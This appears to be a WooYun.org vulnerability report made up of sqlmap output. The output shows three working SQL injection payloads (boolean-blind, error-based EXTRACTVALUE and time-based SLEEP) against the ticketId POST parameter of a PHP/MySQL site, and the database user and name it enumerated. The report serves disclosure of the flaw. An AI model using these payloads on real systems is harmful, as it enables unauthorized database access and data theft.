WooYun.org

参数 --no-cast
sqlmap identified the following injection points with a total of 708 HTTP(s) requests:
---
Parameter: ticketId (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: day=e&ticketId=1' RLIKE (SELECT (CASE WHEN (4832=4832) THEN 1 ELSE 0x28 END)) AND 'pfzc'='pfzc
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: day=e&ticketId=1' AND EXTRACTVALUE(7652,CONCAT(0x5c,0x7171787671,(SELECT (ELT(7652=7652,1))),0x716a706271)) AND 'MyZg'='MyZg
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: day=e&ticketId=1' OR SLEEP(5) AND 'jKGb'='jKGb
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.1
current user:    'zhouyouqilu@%'
current database:    'zhouyouqilu'
current user is DBA:    False
available databases [1]:
[*] zhouyouqilu